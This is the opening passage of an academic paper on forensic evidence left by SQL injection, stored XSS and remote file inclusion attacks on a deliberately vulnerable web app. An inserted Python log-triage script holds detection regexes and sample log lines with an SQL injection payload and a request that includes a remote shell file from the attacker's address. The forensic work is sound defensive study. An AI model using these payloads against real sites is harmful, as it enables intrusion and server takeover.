Computer Forensic Analysis of Some Web Attacks
Nataša Šuteva, Aleksandra Mileva
Faculty of Computer Science
University Goce Delčev
Štip, Republic of Macedonia
{natasa.suteva, aleksandra.mileva}@ugd.edu.mk
Mario Loleski
Forensic Department
Ministry of Interior of the Republic of Macedonia,
Skopje, Republic of Macedonia
mario_loleski@moi.gov.mk
Abstract—The Symantec Internet Security Threat Report 2014 reports an alarming fact: when an attacker looked for a site to compromise, one in eight sites made it relatively easy to gain access. Many attackers are arrested because of the evidence obtained by computer forensics. The victim machine usually yields some data, which are then used to identify possible suspects, followed by forensic analysis of their devices, such as computers, laptops, tablets, and even smart phones. In this paper, we use an attack scenario on the known vulnerable web application WackoPicko, with three types of attacks: SQL injection, stored XSS, and remote file inclusion, usually performed through a web browser. We use post-mortem computer forensic analysis of the attacker and victim machines to find artifacts in them which can help to identify and possibly reconstruct the attack and, most importantly, to obtain valid evidence that holds in court. We assume that the attacker was careless and did not apply any anti-forensic techniques on the attacker's machine.
Keywords-Computer Forensics; SQL Injection; File Inclusion;
XSS.
I. INTRODUCTION
Vulnerability scans of public websites carried out in 2013
by Symantec’s Website Vulnerability Assessment Services
found that 77 percent of sites contained vulnerabilities, and 16
percent of them were classified as critical vulnerabilities that
could allow attackers to access sensitive data, alter the
website’s content, or compromise visitors’ computers (Internet
Security Threat Report 2014, [1]). The OWASP (Open Web Application Security Project) Top Ten 2013 [2] offers a list of the most critical web application vulnerabilities, including different types of injection, broken authentication and session management, cross-site scripting, security misconfiguration, etc. Many organizations lose reputation or revenue because of various hacker attacks. Today, cybercrime is a global problem, and computer forensics is one way to combat it. Computer forensics prepares legal evidence and gives answers to many questions of legal systems related to computers. Analyzed forensic images are the primary evidence.
We chose to investigate three types of attacks, SQL injection, stored XSS and remote file inclusion, which are usually conducted through a web browser. We are interested in what kind of post-mortem forensic artifacts can be found on the attacker and victim machines after the attack is performed. As the test web application, we use the known vulnerable WackoPicko [3], first introduced by Doupe et al. [4]. We also assume that the attacker did not apply any anti-forensic techniques (format, wipe, etc.) on their machine. We are aware that the conducted research is very platform-specific, so our results hold for the dominant Apache web server and a BackTrack 5 R3 attacker machine, but similar artifacts can also be expected on other related attacker/victim platforms.
We show that, of the three types of attacks, remote file inclusion and the use of web shells leave many traces on both machines, most of them in log files on the victim and in the web browser history on the attacker.
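As an added example (not the paper's own tooling), the following Python triage scans Apache combined-format access log lines on the victim for footprints of the three attack types; the log lines are constructed, the client address is the attacker machine from the paper's scenario, and the WackoPicko paths and the remote shell URL are assumed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access log lines (not from the paper). The client
# address is the paper's BackTrack machine; the WackoPicko paths and shell URL are hypothetical.
SAMPLE_LOG = """\
192.168.60.159 - - [10/Mar/2014:13:01:02 +0100] "GET /WackoPicko/users/login.php HTTP/1.1" 200 1542 "-" "Mozilla/5.0"
192.168.60.159 - - [10/Mar/2014:13:01:40 +0100] "GET /WackoPicko/users/view.php?userid=1%27+OR+%271%27%3D%271 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.60.159 - - [10/Mar/2014:13:02:15 +0100] "POST /WackoPicko/pictures/add_comment.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.60.159 - - [10/Mar/2014:13:03:05 +0100] "GET /WackoPicko/admin/index.php?page=http://192.168.60.159/shell.txt HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2014:13:04:11 +0100] "GET /WackoPicko/pictures/recent.php HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
"""

# One combined-log line: client IP, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Matched against the URL-decoded request path; the first matching kind wins.
INDICATORS = [
    ("sqli", re.compile(r"(?i)'\s*(or|and)\b|union\s+select|--")),
    ("xss", re.compile(r"(?i)<script|javascript:|on(error|load)\s*=")),
    ("rfi", re.compile(r"(?i)[?&][a-z_]+=(https?|ftp)://")),  # parameter holding a remote URL
]

def triage(log_text):
    """Return (ip, time, kind, decoded_path) for each line that trips an indicator.
    Only the request line is logged, so a stored-XSS payload sent in a POST body
    (the add_comment.php line) is invisible here and must be recovered elsewhere."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or truncated line; a full triage would record it
        path = unquote_plus(m.group("path"))
        for kind, pattern in INDICATORS:
            if pattern.search(path):
                findings.append((m.group("ip"), m.group("time"), kind, path))
                break
    return findings

def suspects(log_text):
    """Map each client IP to the set of attack kinds seen from it (candidate suspects)."""
    out = {}
    for ip, _time, kind, _path in triage(log_text):
        out.setdefault(ip, set()).add(kind)
    return out
```

The stored-XSS request leaves only a POST entry in the access log, which is why the paper's stored-XSS artifacts have to come from the database and the attacker's browser history rather than from this file.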
After this introduction, Section II is devoted to the attack scenario, including a short description of the vulnerable web application WackoPicko and a detailed description of the three performed attacks: SQL injection, stored XSS and remote file inclusion. In Section III we give a brief overview of the performed forensic analysis of both machines, followed by a discussion of the results and final conclusions.
A. Previous work
To our knowledge, there are not many papers on the forensic investigation of web attacks. Andrade and Gan [5] investigate passive attacks for determining vulnerabilities of a Linux Ubuntu server, using Linux BackTrack 5 tools, including Metasploit, Nessus, Whatweb, Nmap, PHP-Backdoor and Weevely. They use the netstat tool and server log files for forensic investigation of the attacks. A good forensic analysis of Linux RAM is given in [6]. Shulman and Waidner [7] show how digital signatures from DNSSEC can be useful in forensic analysis.
II. ATTACK SCENARIO
For the attack, we use a VMware virtual machine with BackTrack 5 R3 installed and with IP address 192.168.60.159.
A. Vulnerable web application
The vulnerable WackoPicko application is a photo sharing and photo-purchasing site. Users of WackoPicko can upload photos, browse other users' photos, comment on photos, and purchase the rights to a high-quality version of a photo. It has 10 vulnerabilities accessible without authentication (reflected and stored XSS, reflected XSS behind JavaScript, predictable session ID for admin, weak admin password, reflected SQLI, command line injection, file inclusion, unauthorized file exposure, and parameter manipulation), and 6 vulnerabilities
Copyright © 2014 WorldCIS-2014 Technical Co-Sponsored by IEEE UK/RI Computer Chapter 43